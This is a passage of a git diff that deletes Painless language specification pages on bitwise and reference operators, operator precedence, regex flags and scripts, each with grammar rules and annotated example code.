Bitwise and with the `def` type. -+ -[source,Painless] ----- -def x = 15 & 6; <1> -def y = x & 5; <2> ----- -<1> declare `def x`; - bitwise and `int 15` and `int 6` -> `int 6`; - implicit cast `int 6` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 6`; - bitwise and `int 6` and `int 5` -> `int 4`; - implicit cast `int 4` to `def` -> `def`; - store `def` to `y` - -[[bitwise-xor-operator]] -==== Bitwise Xor - -Use the `bitwise xor operator '^'` to XOR together each bit within two integer -type values where if one bit is a `1` and the other bit is a `0` at the same -index the resultant bit is `1` otherwise the resultant bit is `0`. - -*Errors* - -* If either of the values is a non-integer type. - -*Bits* - -The following table illustrates the resultant bit from the xoring of two bits. 
- -[cols="^1,^1,^1"] -|==== -| | 1 | 0 -| 1 | 0 | 1 -| 0 | 1 | 0 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_xor: expression '^' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | def -| byte | int | int | int | int | long | def -| short | int | int | int | int | long | def -| char | int | int | int | int | long | def -| int | int | int | int | int | long | def -| long | long | long | long | long | long | def -| def | def | def | def | def | def | def -|==== - -*Examples* - -* Bitwise xor with different integer types. -+ -[source,Painless] ----- -int i = 5 ^ 6; <1> -long l = i ^ 5L; <2> ----- -+ -<1> declare `int i`; - bitwise xor `int 5` and `int 6` -> `int 3`; - store `int 3` in `i` -<2> declare `long l` - load from `int i` -> `int 4`; - promote `int 3` and `long 5`: result `long`; - implicit cast `int 3` to `long 3` -> `long 3`; - bitwise xor `long 3` and `long 5` -> `long 6`; - store `long 6` to `l` -+ -* Bitwise xor with the `def` type. -+ -[source,Painless] ----- -def x = 15 ^ 6; <1> -def y = x ^ 5; <2> ----- -<1> declare `def x`; - bitwise xor `int 15` and `int 6` -> `int 9`; - implicit cast `int 9` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 9`; - bitwise xor `int 9` and `int 5` -> `int 12`; - implicit cast `int 12` to `def` -> `def`; - store `def` to `y` - -[[bitwise-or-operator]] -==== Bitwise Or - -Use the `bitwise or operator '|'` to OR together each bit within two integer -type values where if at least one bit is a `1` at the same index the resultant -bit is `1` otherwise the resultant bit is `0`. - -*Errors* - -* If either of the values is a non-integer type. - -*Bits* - -The following table illustrates the resultant bit from the oring of two bits. - -[cols="^1,^1,^1"] -|==== -| | 1 | 0 -| 1 | 1 | 1 -| 0 | 1 | 0 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_or: expression '|' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | def -| byte | int | int | int | int | long | def -| short | int | int | int | int | long | def -| char | int | int | int | int | long | def -| int | int | int | int | int | long | def -| long | long | long | long | long | long | def -| def | def | def | def | def | def | def -|==== - -*Examples* - -* Bitwise or with different integer types. -+ -[source,Painless] ----- -int i = 5 | 6; <1> -long l = i | 8L; <2> ----- -+ -<1> declare `int i`; - bitwise or `int 5` and `int 6` -> `int 7`; - store `int 7` in `i` -<2> declare `long l` - load from `int i` -> `int 7`; - promote `int 7` and `long 8`: result `long`; - implicit cast `int 7` to `long 7` -> `long 7`; - bitwise or `long 7` and `long 8` -> `long 15`; - store `long 15` to `l` -+ -* Bitwise or with the `def` type. 
-+
-[source,Painless]
-----
-def x = 5 | 6; <1>
-def y = x | 8; <2>
-----
-<1> declare `def x`;
-    bitwise or `int 5` and `int 6` -> `int 7`;
-    implicit cast `int 7` to `def` -> `def`;
-    store `def` in `x`
-<2> declare `def y`;
-    load from `x` -> `def`;
-    implicit cast `def` to `int 7`;
-    bitwise or `int 7` and `int 8` -> `int 15`;
-    implicit cast `int 15` to `def` -> `def`;
-    store `def` to `y`
diff --git a/docs/painless/painless-lang-spec/painless-operators-reference.asciidoc b/docs/painless/painless-lang-spec/painless-operators-reference.asciidoc
deleted file mode 100644
index dbdae92b270..00000000000
--- a/docs/painless/painless-lang-spec/painless-operators-reference.asciidoc
+++ /dev/null
@@ -1,774 +0,0 @@
-[[painless-operators-reference]]
-=== Operators: Reference
-
-[[method-call-operator]]
-==== Method Call
-
-Use the `method call operator '()'` to call a member method on a
-<> value. Implicit
-<> is evaluated as necessary per argument
-during the method call. When a method call is made on a target `def` type value,
-the parameters and return type value are considered to also be of the `def` type
-and are evaluated at run-time.
-
-An overloaded method is one that shares the same name with two or more methods.
-A method is overloaded based on arity where the same name is re-used for
-multiple methods as long as the number of parameters differs.
-
-*Errors*
-
-* If the reference type value is `null`.
-* If the member method name doesn't exist for a given reference type value.
-* If the number of arguments passed in is different from the number of specified
-  parameters.
-* If the arguments cannot be implicitly cast or implicitly boxed/unboxed to the
-  correct type values for the parameters.
-
-*Grammar*
-
-[source,ANTLR4]
-----
-method_call: '.' ID arguments;
-arguments: '(' (expression (',' expression)*)? ')';
-----
-
-*Examples*
-
-* Method calls on different reference types.
-+
-[source,Painless]
-----
-Map m = new HashMap(); <1>
-m.put(1, 2); <2>
-int z = m.get(1); <3>
-def d = new ArrayList(); <4>
-d.add(1); <5>
-int i = Integer.parseInt(d.get(0).toString()); <6>
-----
-+
-<1> declare `Map m`;
-    allocate `HashMap` instance -> `HashMap reference`;
-    store `HashMap reference` to `m`
-<2> load from `m` -> `Map reference`;
-    implicit cast `int 1` to `def` -> `def`;
-    implicit cast `int 2` to `def` -> `def`;
-    call `put` on `Map reference` with arguments (`int 1`, `int 2`)
-<3> declare `int z`;
-    load from `m` -> `Map reference`;
-    call `get` on `Map reference` with arguments (`int 1`) -> `def`;
-    implicit cast `def` to `int 2` -> `int 2`;
-    store `int 2` to `z`
-<4> declare `def d`;
-    allocate `ArrayList` instance -> `ArrayList reference`;
-    implicit cast `ArrayList reference` to `def` -> `def`;
-    store `def` to `d`
-<5> load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `add` on `ArrayList reference` with arguments (`int 1`);
-<6> declare `int i`;
-    load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `get` on `ArrayList reference` with arguments (`int 0`) -> `def`;
-    implicit cast `def` to `Integer 1 reference` -> `Integer 1 reference`;
-    call `toString` on `Integer 1 reference` -> `String '1'`;
-    call `parseInt` on `Integer` with arguments (`String '1'`) -> `int 1`;
-    store `int 1` in `i`;
-
-[[field-access-operator]]
-==== Field Access
-
-Use the `field access operator '.'` to store a value to or load a value from a
-<> member field.
-
-*Errors*
-
-* If the reference type value is `null`.
-* If the member field name doesn't exist for a given reference type value. - -*Grammar* - -[source,ANTLR4] ----- -field_access: '.' ID; ----- - -*Examples* - -The examples use the following reference type definition: - -[source,Painless] ----- -name: - Example - -non-static member fields: - * int x - * def y - * List z ----- - -* Field access with the `Example` type. -+ -[source,Painless] ----- -Example example = new Example(); <1> -example.x = 1; <2> -example.y = example.x; <3> -example.z = new ArrayList(); <4> -example.z.add(1); <5> -example.x = example.z.get(0); <6> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> load from `example` -> `Example reference`; - store `int 1` to `x` of `Example reference` -<3> load from `example` -> `Example reference @0`; - load from `example` -> `Example reference @1`; - load from `x` of `Example reference @1` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y` of `Example reference @0`; - (note `Example reference @0` and `Example reference @1` are the same) -<4> load from `example` -> `Example reference`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `z` of `Example reference` -<5> load from `example` -> `Example reference`; - load from `z` of `Example reference` -> `List reference`; - call `add` on `List reference` with arguments (`int 1`) -<6> load from `example` -> `Example reference @0`; - load from `example` -> `Example reference @1`; - load from `z` of `Example reference @1` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `int 1`; - store `int 1` in `x` of `List reference @0`; - (note `Example reference @0` and `Example reference @1` are the same) - -[[null-safe-operator]] -==== Null Safe - -Use the `null safe operator '?.'` instead of the method call operator or field -access operator to ensure a reference type value is `non-null` before -a method call or field access. A `null` value will be returned if the reference -type value is `null`, otherwise the method call or field access is evaluated. - -*Errors* - -* If the method call return type value or the field access type value is not - a reference type value and is not implicitly castable to a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -null_safe: null_safe_method_call - | null_safe_field_access - ; - -null_safe_method_call: '?.' ID arguments; -arguments: '(' (expression (',' expression)*)? ')'; - -null_safe_field_access: '?.' ID; ----- - -*Examples* - -The examples use the following reference type definition: - -[source,Painless] ----- -name: - Example - -non-static member methods: - * List factory() - -non-static member fields: - * List x ----- - -* Null safe without a `null` value. 
-+ -[source,Painless] ----- -Example example = new Example(); <1> -List x = example?.factory(); <2> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> declare `List x`; - load from `example` -> `Example reference`; - null safe call `factory` on `Example reference` -> `List reference`; - store `List reference` to `x`; -+ -* Null safe with a `null` value; -+ -[source,Painless] ----- -Example example = null; <1> -List x = example?.x; <2> ----- -<1> declare `Example example`; - store `null` to `example` -<2> declare `List x`; - load from `example` -> `Example reference`; - null safe access `x` on `Example reference` -> `null`; - store `null` to `x`; - (note the *null safe operator* returned `null` because `example` is `null`) - -[[list-initialization-operator]] -==== List Initialization - -Use the `list initialization operator '[]'` to allocate an `List` type instance -to the heap with a set of pre-defined values. Each value used to initialize the -`List` type instance is cast to a `def` type value upon insertion into the -`List` type instance using the `add` method. The order of the specified values -is maintained. - -*Grammar* - -[source,ANTLR4] ----- -list_initialization: '[' expression (',' expression)* ']' - | '[' ']'; ----- - -*Examples* - -* List initialization of an empty `List` type value. -+ -[source,Painless] ----- -List empty = []; <1> ----- -+ -<1> declare `List empty`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `empty` -+ -* List initialization with static values. -+ -[source,Painless] ----- -List list = [1, 2, 3]; <1> ----- -+ -<1> declare `List list`; - allocate `ArrayList` instance -> `ArrayList reference`; - call `add` on `ArrayList reference` with arguments(`int 1`); - call `add` on `ArrayList reference` with arguments(`int 2`); - call `add` on `ArrayList reference` with arguments(`int 3`); - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `list` -+ -* List initialization with non-static values. 
-+ -[source,Painless] ----- -int i = 1; <1> -long l = 2L; <2> -float f = 3.0F; <3> -double d = 4.0; <4> -String s = "5"; <5> -List list = [i, l, f*d, s]; <6> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> declare `long l`; - store `long 2` to `l` -<3> declare `float f`; - store `float 3.0` to `f` -<4> declare `double d`; - store `double 4.0` to `d` -<5> declare `String s`; - store `String "5"` to `s` -<6> declare `List list`; - allocate `ArrayList` instance -> `ArrayList reference`; - load from `i` -> `int 1`; - call `add` on `ArrayList reference` with arguments(`int 1`); - load from `l` -> `long 2`; - call `add` on `ArrayList reference` with arguments(`long 2`); - load from `f` -> `float 3.0`; - load from `d` -> `double 4.0`; - promote `float 3.0` and `double 4.0`: result `double`; - implicit cast `float 3.0` to `double 3.0` -> `double 3.0`; - multiply `double 3.0` and `double 4.0` -> `double 12.0`; - call `add` on `ArrayList reference` with arguments(`double 12.0`); - load from `s` -> `String "5"`; - call `add` on `ArrayList reference` with arguments(`String "5"`); - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `list` - -[[list-access-operator]] -==== List Access - -Use the `list access operator '[]'` as a shortcut for a `set` method call or -`get` method call made on a `List` type value. - -*Errors* - -* If a value other than a `List` type value is accessed. -* If a non-integer type value is used as an index for a `set` method call or - `get` method call. - -*Grammar* - -[source,ANTLR4] ----- -list_access: '[' expression ']' ----- - -*Examples* - -* List access with the `List` type. -+ -[source,Painless] ----- -List list = new ArrayList(); <1> -list.add(1); <2> -list.add(2); <3> -list.add(3); <4> -list[0] = 2; <5> -list[1] = 5; <6> -int x = list[0] + list[1]; <7> -int y = 1; <8> -int z = list[y]; <9> ----- -+ -<1> declare `List list`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `list` -<2> load from `list` -> `List reference`; - call `add` on `List reference` with arguments(`int 1`) -<3> load from `list` -> `List reference`; - call `add` on `List reference` with arguments(`int 2`) -<4> load from `list` -> `List reference`; - call `add` on `List reference` with arguments(`int 3`) -<5> load from `list` -> `List reference`; - call `set` on `List reference` with arguments(`int 0`, `int 2`) -<6> load from `list` -> `List reference`; - call `set` on `List reference` with arguments(`int 1`, `int 5`) -<7> declare `int x`; - load from `list` -> `List reference`; - call `get` on `List reference` with arguments(`int 0`) -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - load from `list` -> `List reference`; - call `get` on `List reference` with arguments(`int 1`) -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `x` -<8> declare `int y`; - store `int 1` int `y` -<9> declare `int z`; - load from `list` -> `List reference`; - load from `y` -> `int 1`; - call `get` on `List reference` with arguments(`int 1`) -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - store `int 5` to `z` -+ -* List access with the `def` type. 
-+
-[source,Painless]
-----
-def d = new ArrayList(); <1>
-d.add(1); <2>
-d.add(2); <3>
-d.add(3); <4>
-d[0] = 2; <5>
-d[1] = 5; <6>
-def x = d[0] + d[1]; <7>
-def y = 1; <8>
-def z = d[y]; <9>
-----
-+
-<1> declare `def d`;
-    allocate `ArrayList` instance -> `ArrayList reference`;
-    implicit cast `ArrayList reference` to `def` -> `def`;
-    store `def` to `d`
-<2> load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `add` on `ArrayList reference` with arguments(`int 1`)
-<3> load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `add` on `ArrayList reference` with arguments(`int 2`)
-<4> load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `add` on `ArrayList reference` with arguments(`int 3`)
-<5> load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `set` on `ArrayList reference` with arguments(`int 0`, `int 2`)
-<6> load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `set` on `ArrayList reference` with arguments(`int 1`, `int 5`)
-<7> declare `def x`;
-    load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `get` on `ArrayList reference` with arguments(`int 0`) -> `def`;
-    implicit cast `def` to `int 2` -> `int 2`;
-    load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    call `get` on `ArrayList reference` with arguments(`int 1`) -> `def`;
-    implicit cast `def` to `int 5` -> `int 5`;
-    add `int 2` and `int 5` -> `int 7`;
-    store `int 7` to `x`
-<8> declare `def y`;
-    implicit cast `int 1` to `def` -> `def`;
-    store `def` to `y`
-<9> declare `def z`;
-    load from `d` -> `def`;
-    implicit cast `def` to `ArrayList reference` -> `ArrayList reference`;
-    load from `y` -> `def`;
-    implicit cast `def` to `int 1` -> `int 1`;
-    call `get` on `ArrayList reference` with arguments(`int 1`) -> `def`;
-    store `def` to `z`
-
-[[map-initialization-operator]]
-==== Map Initialization
-
-Use the `map initialization operator '[:]'` to allocate a `Map` type instance to
-the heap with a set of pre-defined values. Each pair of values used to
-initialize the `Map` type instance is cast to `def` type values upon insertion
-into the `Map` type instance using the `put` method.
-
-*Grammar*
-
-[source,ANTLR4]
-----
-map_initialization: '[' key_pair (',' key_pair)* ']'
-    | '[' ':' ']';
-key_pair: expression ':' expression
-----
-
-*Examples*
-
-* Map initialization of an empty `Map` type value.
-+
-[source,Painless]
-----
-Map empty = [:]; <1>
-----
-+
-<1> declare `Map empty`;
-    allocate `HashMap` instance -> `HashMap reference`;
-    implicit cast `HashMap reference` to `Map reference` -> `Map reference`;
-    store `Map reference` to `empty`
-+
-* Map initialization with static values.
-+
-[source,Painless]
-----
-Map map = [1:2, 3:4, 5:6]; <1>
-----
-+
-<1> declare `Map map`;
-    allocate `HashMap` instance -> `HashMap reference`;
-    call `put` on `HashMap reference` with arguments(`int 1`, `int 2`);
-    call `put` on `HashMap reference` with arguments(`int 3`, `int 4`);
-    call `put` on `HashMap reference` with arguments(`int 5`, `int 6`);
-    implicit cast `HashMap reference` to `Map reference` -> `Map reference`;
-    store `Map reference` to `map`
-+
-* Map initialization with non-static values.
-+
-[source,Painless]
-----
-byte b = 0; <1>
-int i = 1; <2>
-long l = 2L; <3>
-float f = 3.0F; <4>
-double d = 4.0; <5>
-String s = "5"; <6>
-Map map = [b:i, l:f*d, d:s]; <7>
-----
-+
-<1> declare `byte b`;
-    store `byte 0` to `b`
-<2> declare `int i`;
-    store `int 1` to `i`
-<3> declare `long l`;
-    store `long 2` to `l`
-<4> declare `float f`;
-    store `float 3.0` to `f`
-<5> declare `double d`;
-    store `double 4.0` to `d`
-<6> declare `String s`;
-    store `String "5"` to `s`
-<7> declare `Map map`;
-    allocate `HashMap` instance -> `HashMap reference`;
-    load from `b` -> `byte 0`;
-    load from `i` -> `int 1`;
-    call `put` on `HashMap reference` with arguments(`byte 0`, `int 1`);
-    load from `l` -> `long 2`;
-    load from `f` -> `float 3.0`;
-    load from `d` -> `double 4.0`;
-    promote `float 3.0` and `double 4.0`: result `double`;
-    implicit cast `float 3.0` to `double 3.0` -> `double 3.0`;
-    multiply `double 3.0` and `double 4.0` -> `double 12.0`;
-    call `put` on `HashMap reference` with arguments(`long 2`, `double 12.0`);
-    load from `d` -> `double 4.0`;
-    load from `s` -> `String "5"`;
-    call `put` on `HashMap reference` with
-    arguments(`double 4.0`, `String "5"`);
-    implicit cast `HashMap reference` to `Map reference` -> `Map reference`;
-    store `Map reference` to `map`
-
-[[map-access-operator]]
-==== Map Access
-
-Use the `map access operator '[]'` as a shortcut for a `put` method call or
-`get` method call made on a `Map` type value.
-
-*Errors*
-
-* If a value other than a `Map` type value is accessed.
-
-*Grammar*
-
-[source,ANTLR4]
-----
-map_access: '[' expression ']'
-----
-
-*Examples*
-
-* Map access with the `Map` type.
-+
-[source,Painless]
-----
-Map map = new HashMap(); <1>
-map['value2'] = 2; <2>
-map['value5'] = 5; <3>
-int x = map['value2'] + map['value5']; <4>
-String y = 'value5'; <5>
-int z = map[y]; <6>
-----
-+
-<1> declare `Map map`;
-    allocate `HashMap` instance -> `HashMap reference`;
-    implicit cast `HashMap reference` to `Map reference` -> `Map reference`;
-    store `Map reference` to `map`
-<2> load from `map` -> `Map reference`;
-    call `put` on `Map reference` with arguments(`String 'value2'`, `int 2`)
-<3> load from `map` -> `Map reference`;
-    call `put` on `Map reference` with arguments(`String 'value5'`, `int 5`)
-<4> declare `int x`;
-    load from `map` -> `Map reference`;
-    call `get` on `Map reference` with arguments(`String 'value2'`) -> `def`;
-    implicit cast `def` to `int 2` -> `int 2`;
-    load from `map` -> `Map reference`;
-    call `get` on `Map reference` with arguments(`String 'value5'`) -> `def`;
-    implicit cast `def` to `int 5` -> `int 5`;
-    add `int 2` and `int 5` -> `int 7`;
-    store `int 7` to `x`
-<5> declare `String y`;
-    store `String 'value5'` to `y`
-<6> declare `int z`;
-    load from `map` -> `Map reference`;
-    load from `y` -> `String 'value5'`;
-    call `get` on `Map reference` with arguments(`String 'value5'`) -> `def`;
-    implicit cast `def` to `int 5` -> `int 5`;
-    store `int 5` to `z`
-+
-* Map access with the `def` type.
-+ -[source,Painless] ----- -def d = new HashMap(); <1> -d['value2'] = 2; <2> -d['value5'] = 5; <3> -int x = d['value2'] + d['value5']; <4> -String y = 'value5'; <5> -def z = d[y]; <6> ----- -+ -<1> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def`; - store `def` to `d` -<2> load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - call `put` on `HashMap reference` with arguments(`String 'value2'`, `int 2`) -<3> load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - call `put` on `HashMap reference` with arguments(`String 'value5'`, `int 5`) -<4> declare `int x`; - load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - call `get` on `HashMap reference` with arguments(`String 'value2'`) - -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - load from `d` -> `def`; - call `get` on `HashMap reference` with arguments(`String 'value5'`) - -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `x` -<5> declare `String y`; - store `String 'value5'` to `y` -<6> declare `def z`; - load from `d` -> `def`; - load from `y` -> `String 'value5'`; - call `get` on `HashMap reference` with arguments(`String 'value5'`) - -> `def`; - store `def` to `z` - -[[new-instance-operator]] -==== New Instance - -Use the `new instance operator 'new ()'` to allocate a -<> instance to the heap and call a specified -constructor. Implicit <> is evaluated as -necessary per argument during the constructor call. - -An overloaded constructor is one that shares the same name with two or more -constructors. A constructor is overloaded based on arity where the same -reference type name is re-used for multiple constructors as long as the number -of parameters differs. - -*Errors* - -* If the reference type name doesn't exist for instance allocation. -* If the number of arguments passed in is different from the number of specified - parameters. -* If the arguments cannot be implicitly cast or implicitly boxed/unboxed to the - correct type values for the parameters. - -*Grammar* - -[source,ANTLR4] ----- -new_instance: 'new' TYPE '(' (expression (',' expression)*)? ')'; ----- - -*Examples* - -* Allocation of new instances with different types. - -[source,Painless] ----- -Map m = new HashMap(); <1> -def d = new ArrayList(); <2> -def e = new HashMap(m); <3> ----- -<1> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `m`; -<2> declare `def d`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `d`; -<3> declare `def e`; - load from `m` -> `Map reference`; - allocate `HashMap` instance with arguments (`Map reference`) - -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def`; - store `def` to `e`; - -[[string-concatenation-operator]] -==== String Concatenation - -Use the `string concatenation operator '+'` to concatenate two values together -where at least one of the values is a <>. - -*Grammar* - -[source,ANTLR4] ----- -concatenate: expression '+' expression; ----- - -*Examples* - -* String concatenation with different primitive types. 
-+
-[source,Painless]
-----
-String x = "con"; <1>
-String y = x + "cat"; <2>
-String z = 4 + 5 + x; <3>
-----
-+
-<1> declare `String x`;
-    store `String "con"` to `x`;
-<2> declare `String y`;
-    load from `x` -> `String "con"`;
-    concat `String "con"` and `String "cat"` -> `String "concat"`;
-    store `String "concat"` to `y`
-<3> declare `String z`;
-    add `int 4` and `int 5` -> `int 9`;
-    concat `int 9` and `String "con"` -> `String "9con"`;
-    store `String "9con"` to `z`;
-    (note the addition is done prior to the concatenation due to precedence and
-    associativity of the specific operations)
-+
-* String concatenation with the `def` type.
-+
-[source,Painless]
-----
-def d = 2; <1>
-d = "con" + d + "cat"; <2>
-----
-+
-<1> declare `def d`;
-    implicit cast `int 2` to `def` -> `def`;
-    store `def` in `d`;
-<2> concat `String "con"` and `int 2` -> `String "con2"`;
-    concat `String "con2"` and `String "cat"` -> `String "con2cat"`;
-    implicit cast `String "con2cat"` to `def` -> `def`;
-    store `def` to `d`;
-    (note the switch in type of `d` from `int` to `String`)
-
-[[elvis-operator]]
-==== Elvis
-
-An elvis consists of two expressions. The first expression is evaluated
-to check for a `null` value. If the first expression evaluates to
-`null` then the second expression is evaluated and its value used. If the first
-expression evaluates to `non-null` then the resultant value of the first
-expression is used. Use the `elvis operator '?:'` as a shortcut for the
-conditional operator.
-
-*Errors*
-
-* If the first expression or second expression cannot produce a `null` value.
-
-*Grammar*
-
-[source,ANTLR4]
-----
-elvis: expression '?:' expression;
-----
-
-*Examples*
-
-* Elvis with different reference types.
-+
-[source,Painless]
-----
-List x = new ArrayList(); <1>
-List y = x ?: new ArrayList(); <2>
-y = null; <3>
-List z = y ?: new ArrayList(); <4>
-----
-+
-<1> declare `List x`;
-    allocate `ArrayList` instance -> `ArrayList reference`;
-    implicit cast `ArrayList reference` to `List reference` -> `List reference`;
-    store `List reference` to `x`;
-<2> declare `List y`;
-    load `x` -> `List reference`;
-    `List reference` equals `null` -> `false`;
-    evaluate 1st expression: `List reference` -> `List reference`;
-    store `List reference` to `y`
-<3> store `null` to `y`;
-<4> declare `List z`;
-    load `y` -> `List reference`;
-    `List reference` equals `null` -> `true`;
-    evaluate 2nd expression:
-    allocate `ArrayList` instance -> `ArrayList reference`;
-    implicit cast `ArrayList reference` to `List reference` -> `List reference`;
-    store `List reference` to `z`;
diff --git a/docs/painless/painless-lang-spec/painless-operators.asciidoc b/docs/painless/painless-lang-spec/painless-operators.asciidoc
deleted file mode 100644
index b105f4ef6fa..00000000000
--- a/docs/painless/painless-lang-spec/painless-operators.asciidoc
+++ /dev/null
@@ -1,64 +0,0 @@
-[[painless-operators]]
-=== Operators
-
-An operator is the most basic action that can be taken to evaluate values in a
-script. An expression is one-to-many consecutive operations. Precedence is the
-order in which an operator will be evaluated relative to another operator.
-Associativity is the direction within an expression in which a specific operator
-is evaluated. The following table lists all available operators:
-
-[cols="<6,<3,^3,^2,^4"]
-|====
-| *Operator* | *Category* | *Symbol(s)* | *Precedence* | *Associativity*
-| <> | <> | () | 0 | left -> right
-| <> | <> | . () | 1 | left -> right
-| <> | <> | . | 1 | left -> right
-| <> | <> | ?.
| 1 | left -> right -| <> | <> | () | 1 | left -> right -| <> | <> | [] {} | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | . | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | [:] | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | ++ | 1 | left -> right -| <> | <> | -- | 1 | left -> right -| <> | <> | ++ | 2 | right -> left -| <> | <> | -- | 2 | right -> left -| <> | <> | + | 2 | right -> left -| <> | <> | - | 2 | right -> left -| <> | <> | ! | 2 | right -> left -| <> | <> | ~ | 2 | right -> left -| <> | <> | () | 3 | right -> left -| <> | <> | new () | 3 | right -> left -| <> | <> | new [] | 3 | right -> left -| <> | <> | * | 4 | left -> right -| <> | <> | / | 4 | left -> right -| <> | <> | % | 4 | left -> right -| <> | <> | + | 5 | left -> right -| <> | <> | + | 5 | left -> right -| <> | <> | - | 5 | left -> right -| <> | <> | << | 6 | left -> right -| <> | <> | >> | 6 | left -> right -| <> | <> | >>> | 6 | left -> right -| <> | <> | > | 7 | left -> right -| <> | <> | >= | 7 | left -> right -| <> | <> | < | 7 | left -> right -| <> | <> | +++<=+++ | 7 | left -> right -| <> | <> | instanceof | 8 | left -> right -| <> | <> | == | 9 | left -> right -| <> | <> | != | 9 | left -> right -| <> | <> | === | 9 | left -> right -| <> | <> | !== | 9 | left -> right -| <> | <> | & | 10 | left -> right -| <> | <> | ^ | 11 | left -> right -| <> | <> | ^ | 11 | left -> right -| <> | <> | \| | 12 | left -> right -| <> | <> | && | 13 | left -> right -| <> | <> | \|\| | 14 | left -> right -| <> | <> | ? : | 15 | right -> left -| <> | <> | ?: | 16 | right -> left -| <> | <> | = | 17 | right -> left -| <> | <> | $= | 17 | right -> left -|==== diff --git a/docs/painless/painless-lang-spec/painless-regexes.asciidoc b/docs/painless/painless-lang-spec/painless-regexes.asciidoc deleted file mode 100644 index 962c4751aab..00000000000 --- a/docs/painless/painless-lang-spec/painless-regexes.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[painless-regexes]] -=== Regexes - -Regular expression constants are directly supported. To ensure fast performance, -this is the only mechanism for creating patterns. Regular expressions -are always constants and compiled efficiently a single time. - -[source,painless] ---------------------------------------------------------- -Pattern p = /[aeiou]/ ---------------------------------------------------------- - -WARNING: A poorly written regular expression can significantly slow performance. -If possible, avoid using regular expressions, particularly in frequently run -scripts. - -[[pattern-flags]] -==== Pattern flags - -You can define flags on patterns in Painless by adding characters after the -trailing `/` like `/foo/i` or `/foo \w #comment/iUx`. 
Painless exposes all of -the flags from Java's -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[ -Pattern class] using these characters: - -[cols="<,<,<",options="header",] -|======================================================================= -| Character | Java Constant | Example -|`c` | CANON_EQ | `'å' ==~ /å/c` (open in hex editor to see) -|`i` | CASE_INSENSITIVE | `'A' ==~ /a/i` -|`l` | LITERAL | `'[a]' ==~ /[a]/l` -|`m` | MULTILINE | `'a\nb\nc' =~ /^b$/m` -|`s` | DOTALL (aka single line) | `'a\nb\nc' =~ /.b./s` -|`U` | UNICODE_CHARACTER_CLASS | `'Ɛ' ==~ /\\w/U` -|`u` | UNICODE_CASE | `'Ɛ' ==~ /ɛ/iu` -|`x` | COMMENTS (aka extended) | `'a' ==~ /a #comment/x` -|======================================================================= \ No newline at end of file diff --git a/docs/painless/painless-lang-spec/painless-scripts.asciidoc b/docs/painless/painless-lang-spec/painless-scripts.asciidoc deleted file mode 100644 index 6c01e6cfa98..00000000000 --- a/docs/painless/painless-lang-spec/painless-scripts.asciidoc +++ /dev/null @@ -1,6 +0,0 @@ -[[painless-scripts]] -=== Scripts - -Scripts are composed of one-to-many <> and are -run in a sandbox that determines what local variables are immediately available -along with what APIs are allowed. diff --git a/docs/painless/painless-lang-spec/painless-statements.asciidoc b/docs/painless/painless-lang-spec/painless-statements.asciidoc deleted file mode 100644 index b627507fa94..00000000000 --- a/docs/painless/painless-lang-spec/painless-statements.asciidoc +++ /dev/null @@ -1,57 +0,0 